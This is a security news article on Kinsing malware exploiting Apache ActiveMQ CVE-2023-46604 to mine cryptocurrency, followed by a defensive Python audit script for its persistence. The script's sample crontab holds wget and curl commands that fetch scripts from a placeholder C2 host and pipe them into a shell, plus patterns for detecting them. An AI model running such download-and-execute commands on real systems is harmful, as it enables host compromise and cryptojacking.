Kinsing Malware Exploits Apache ActiveMQ Vulnerability to Mine Cryptocurrency

Security researchers from Trend Micro have discovered that the Kinsing malware (also known as h2miner) is actively exploiting the Apache ActiveMQ vulnerability CVE-2023-46604 to download cryptocurrency miners onto Linux systems. This vulnerability, which allows remote code execution (RCE), has been used by Kinsing to infiltrate servers and spread rapidly across networks.

The Apache ActiveMQ vulnerability CVE-2023-46604 is a critical security flaw that affects OpenWire commands, a feature of ActiveMQ that allows for communication between different applications. When exploited, this vulnerability allows an attacker to execute arbitrary code on the vulnerable system.

[Figure: Executing the malicious script via bash]

The Kinsing malware is a particularly dangerous threat that targets Linux-based systems. It can gain entry by exploiting vulnerabilities in web applications or misconfigured container environments. Once inside a system, Kinsing deploys a cryptocurrency-mining script that exploits the host’s resources to mine cryptocurrencies like Bitcoin. This can result in significant damage to the infrastructure and a negative impact on system performance.

To exploit the Apache ActiveMQ vulnerability CVE-2023-46604, the Kinsing malware uses a public exploit that leverages the ProcessBuilder method to execute commands on affected systems. Once the vulnerability is exploited, Kinsing downloads and executes a malicious installer, which in turn executes a malicious script using bash.

The Kinsing malware takes several steps to ensure its persistence on the affected host. It adds a cronjob to download and execute its malicious bootstrap script every minute, and it loads its rootkit in /etc/ld.so.preload, which completes a full system compromise.
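The two persistence indicators described above, a cron entry that runs every minute and pipes a download into a shell, and any library listed in /etc/ld.so.preload, can be checked for with a small audit script. This is an added example written for this article, not code from Trend Micro or from the malware; the crontab lines, URLs and library path in it are constructed placeholders.

```python
"""Audit helpers for the Kinsing persistence indicators described above:
a per-minute cron job that downloads and runs a bootstrap script, and a
shared object injected through /etc/ld.so.preload."""
import re
from typing import List

# Constructed sample crontab (placeholder host name and script names).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
* * * * * wget -q -O - http://EXAMPLE-C2.invalid/bootstrap.sh | bash > /dev/null 2>&1
*/5 * * * * /usr/local/bin/healthcheck
* * * * * curl -fsSL http://EXAMPLE-C2.invalid/unk.sh | sh
"""

# Constructed sample /etc/ld.so.preload contents. On a clean host this file
# is normally absent or empty, so any entry deserves review.
SAMPLE_LD_PRELOAD = "/usr/lib/EXAMPLE-rootkit.so\n"

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
PIPED_SHELL = re.compile(r"\|\s*(ba)?sh\b")


def every_minute(schedule: str) -> bool:
    """True when the five cron fields mean 'run every minute'."""
    return schedule.split() == ["*"] * 5


def find_download_exec_cron(crontab: str) -> List[str]:
    """Return cron lines that run every minute and pipe a download into a shell."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)          # five schedule fields + command
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        if every_minute(schedule) and DOWNLOADER.search(command) and PIPED_SHELL.search(command):
            hits.append(line)
    return hits


def ld_preload_entries(content: str) -> List[str]:
    """Return non-empty, non-comment entries from an ld.so.preload file."""
    return [l.strip() for l in content.splitlines() if l.strip() and not l.startswith("#")]


if __name__ == "__main__":
    for hit in find_download_exec_cron(SAMPLE_CRONTAB):
        print("suspicious cron entry:", hit)
    for entry in ld_preload_entries(SAMPLE_LD_PRELOAD):
        print("preloaded library:", entry)
```

On a live host, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d, and the contents of /etc/ld.so.preload if it exists.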

The CVE-2023-46604 vulnerability is being actively exploited by a wide range of threat actors, including the group behind Kinsing malware. This makes it a significant security risk to organizations worldwide.

Organizations that use Apache ActiveMQ must patch CVE-2023-46604 immediately. In addition, they should keep security patches up to date, regularly audit configurations, and monitor network traffic for unusual activity.